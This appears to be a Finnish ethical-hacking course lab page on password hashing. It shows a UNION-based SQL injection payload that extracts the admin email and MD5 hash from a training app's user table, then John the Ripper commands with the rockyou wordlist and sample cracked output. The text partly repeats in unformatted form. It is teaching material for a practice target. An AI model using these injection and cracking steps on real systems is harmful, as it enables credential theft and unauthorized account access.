Nykyisin on onneksi melko harvinaista, että sovellukset tallentavat käyttäjien salasanat selkokielisenä tietokantaan. Tällöinhän hyökkääjä, joka saisi tietokannan varastettua, saisi läjän salasanoja, joita koittaa esimerkiksi käyttäjien tileihin muissa palveluissa (tästä syystä salasanoja ei saa uudelleenkäyttää).

Sen sijaan salasanat yleensä "hashataan", eli ajetaan yksisuuntaisen tiivistealgoritmin läpi, joita ovat esimerkiksi MD5, SHA1, jne.

Esimerkiksi tekstin "kissa123" MD5-tiiviste on 

. Sovellus voisi siis tallentaa käyttäjän tietokantaan seuraavasti: 

PasswordHash: 13c3a117d0013ab22417c8edca354b76

Kun Jaska Jokunen kirjautuu, sovellus tarkistaa että onko 

== tietokantaan tallennettu salasanatiiviste.

Hyökkääjä sen sijaan ei voi suoraan muuttaa tiivistettä 13c3a117d0013ab22417c8edca354b76 takaisin muotoon "kissa123". Tiivistealgoritmit ovat yksisuuntaisia.

Hyökkääjä voi kuitenkin arvailla raa'alla laskentateholla ja sanalistoilla.

Onko "pokemon" tiiviste 13c3a117d0013ab22417c8edca354b76? Ei.

Onko "kitara456" tiiviste 13c3a117d0013ab22417c8edca354b76? Ei.

Onko "kissa123" tiiviste 13c3a117d0013ab22417c8edca354b76? Kyllä.

Tällaista arvailua kutsutaan yleensä salasanan kräkkäämiseksi.

Admin-käyttäjän salasanatiivisteen hankkiminen

Käytä tuttua ja turvallista luottokorttihaussa olevaa SQL-injektiohaavoittuvuutta ja hae admin-käyttäjän salasanatiiviste. Askeleet ovat täsmälleen samat kuin tehtävässä, jossa hait järjestelmänvalvojan salasanan, silloin salasana vain oli selkokielinen. Tässä askeleet muistin virkistykseksi (nämä kaikki on opittu aiemmin kurssilla): 

-lausekkeen tekstin sisältä ja kommentoi loput kyselystä kahdella viivalla (ja välilyönnillä), jotta kysely menee taas läpi.

, jne. kunnes saat selville kyselyn palauttamien sarakkeiden määrän.

 -lauseke jossa on oikea määrä sarakkeita. Kokeile ensin vaikka 

-arvoilla ja sitten koita löytää sarake, joka heijastuu sovelluksessa, eli reflektiopiste.

 hakemaan email- ja password-sarakkeet user-taulusta. Suodata rivit sellaisiin, joiden 

Voit vaihtelun vuoksi palauttaa sekä käyttäjätunnuksen että salasanatiivisteen yhdessä sarakkeessa, hyödyntäen MySQL 

Käytetään MD5-tiivisteen murtamiseen John The Ripper (JTR) -työkalua. Avaa hyökkääjän terminaali ja kopioi admin-käyttäjän tiiviste tekstitiedostoon nimeltä hash.txt. Esimerkiksi näin: 

Salasanalista, jota käytetään arvaamiseen (--wordlist): /usr/share/wordlists/rockyou.txt

Tiedosto, josta tiiviste löytyy: hash.txt

Tulosteen pitäisi olla jotain tämän suuntaista; tässä tapauksessa salasana oli "tucker". 

Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) Press 'q' or Ctrl-C to abort, almost any other key for status


DONE (2021-07-01 07:12) 100.0g/s 115200p/s 115200c/s 115200C/s football1..summer1

Kirjaudu sisään aiemmin hakemallasi sähköpostilla ja kräkätyllä salasanalla, niin saat harjoituksen suoritettua.

Tässä labrassa salasanat ovatkin tiivistealgoritmilla suojattuja, joten pääset kräkkäämään niitä JTR (John the Ripper) työkalulla.

MySQLI - Salasanatiivisteiden murtaminen

## Tiivistealgoritmit

Nykyisin on onneksi melko harvinaista, että sovellukset tallentavat käyttäjien salasanat selkokielisenä tietokantaan. Tällöinhän hyökkääjä, joka saisi tietokannan varastettua, saisi läjän salasanoja, joita koittaa esimerkiksi käyttäjien tileihin muissa palveluissa (tästä syystä salasanoja ei saa uudelleenkäyttää).

Sen sijaan salasanat yleensä "hashataan", eli ajetaan yksisuuntaisen tiivistealgoritmin läpi, joita ovat esimerkiksi MD5, SHA1, jne.

Esimerkiksi tekstin "kissa123" MD5-tiiviste on **13c3a117d0013ab22417c8edca354b76**. Sovellus voisi siis tallentaa käyttäjän tietokantaan seuraavasti: 

**Email: jaska.jokunen@example.com**

**PasswordHash: 13c3a117d0013ab22417c8edca354b76**

Kun Jaska Jokunen kirjautuu, sovellus tarkistaa että onko **MD5(jaskan syöttämä salasana) **== tietokantaan tallennettu salasanatiiviste.

Hyökkääjä sen sijaan ei voi suoraan muuttaa tiivistettä 13c3a117d0013ab22417c8edca354b76 takaisin muotoon "kissa123". Tiivistealgoritmit ovat yksisuuntaisia.

Hyökkääjä voi kuitenkin arvailla raa'alla laskentateholla ja sanalistoilla.

- Onko "pokemon" tiiviste 13c3a117d0013ab22417c8edca354b76? Ei.
- Onko "kitara456" tiiviste 13c3a117d0013ab22417c8edca354b76? Ei.
- Onko "kissa123" tiiviste 13c3a117d0013ab22417c8edca354b76? Kyllä.

Tällaista arvailua kutsutaan yleensä salasanan kräkkäämiseksi.

---

## Admin-käyttäjän salasanatiivisteen hankkiminen

Käytä tuttua ja turvallista luottokorttihaussa olevaa SQL-injektiohaavoittuvuutta ja hae admin-käyttäjän salasanatiiviste. Askeleet ovat täsmälleen samat kuin tehtävässä, jossa hait järjestelmänvalvojan salasanan, silloin salasana vain oli selkokielinen. Tässä askeleet muistin virkistykseksi (nämä kaikki on opittu aiemmin kurssilla): 

- Karkaa hipsulla **LIKE**-lausekkeen tekstin sisältä ja kommentoi loput kyselystä kahdella viivalla (ja välilyönnillä), jotta kysely menee taas läpi.
- Lisää kyselyn perään **ORDER BY 1**, **ORDER BY 2**, jne. kunnes saat selville kyselyn palauttamien sarakkeiden määrän.
- Lisää **UNION SELECT** -lauseke jossa on oikea määrä sarakkeita. Kokeile ensin vaikka **NULL**-arvoilla ja sitten koita löytää sarake, joka heijastuu sovelluksessa, eli reflektiopiste.
- Laita **UNION SELECT** hakemaan email- ja password-sarakkeet user-taulusta. Suodata rivit sellaisiin, joiden **admin**-sarakkeen arvo on **True**.

Voit vaihtelun vuoksi palauttaa sekä käyttäjätunnuksen että salasanatiivisteen yhdessä sarakkeessa, hyödyntäen MySQL **concat**-funktiota.

Malli: 

```sql
UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,concat(email, ":", password),NULL FROM user WHERE admin=True
```

---

## Tiivisteen murtaminen

Käytetään MD5-tiivisteen murtamiseen John The Ripper (JTR) -työkalua. Avaa hyökkääjän terminaali ja kopioi admin-käyttäjän tiiviste tekstitiedostoon nimeltä hash.txt. Esimerkiksi näin: 

```
echo -ne "6243e1116e9de008e4dcf0aa2700ca89" > hash.txt
```

Seuraavaksi aja JTR (**john**) seuraavilla asetuksilla: 

- Tiivistealgoritmi (--format): raw-md5
- Salasanalista, jota käytetään arvaamiseen (--wordlist): /usr/share/wordlists/rockyou.txt
- Tiedosto, josta tiiviste löytyy: hash.txt

```sh
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

Tulosteen pitäisi olla jotain tämän suuntaista; tässä tapauksessa salasana oli "tucker". 

*Created directory: /root/.john Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 \[MD5 256/256 AVX2 8x3\]) Press 'q' or Ctrl-C to abort, almost any other key for status
****tucker**** (?) 1g 0:00:00:00*

*DONE (2021-07-01 07:12) 100.0g/s 115200p/s 115200c/s 115200C/s football1..summer1*

Voit ajaa vielä john --show komennon: 

```sh
john --show --format=raw-md5 hash.txt
```

Komennon pitäisi tulostaa salasana.

*?:****tucker**** 1 password hash cracked, 0 left*

Kirjaudu sisään aiemmin hakemallasi sähköpostilla ja kräkätyllä salasanalla, niin saat harjoituksen suoritettua.

@exercise e9b9b7d961ff


(MySQL) UNION ja salasanatiivisteiden (hash) murtaminen

SQL-injektio lienee syynä valtaosaan vakavista tietomurroista, pääasiallisesti sen takia että haavoittuvuus on suuressa sovelluksessa erittäin todennäköinen jos teknologiavalinnat ovat huonot, ja seuraus on yleensä koko tietokannan vuotaminen hyökkääjälle.

(MySQL) UNION ja salasanatiivisteiden (hash) murtaminen

Tiivistealgoritmit

Hakkeroinnin oppiminen alkaa tästä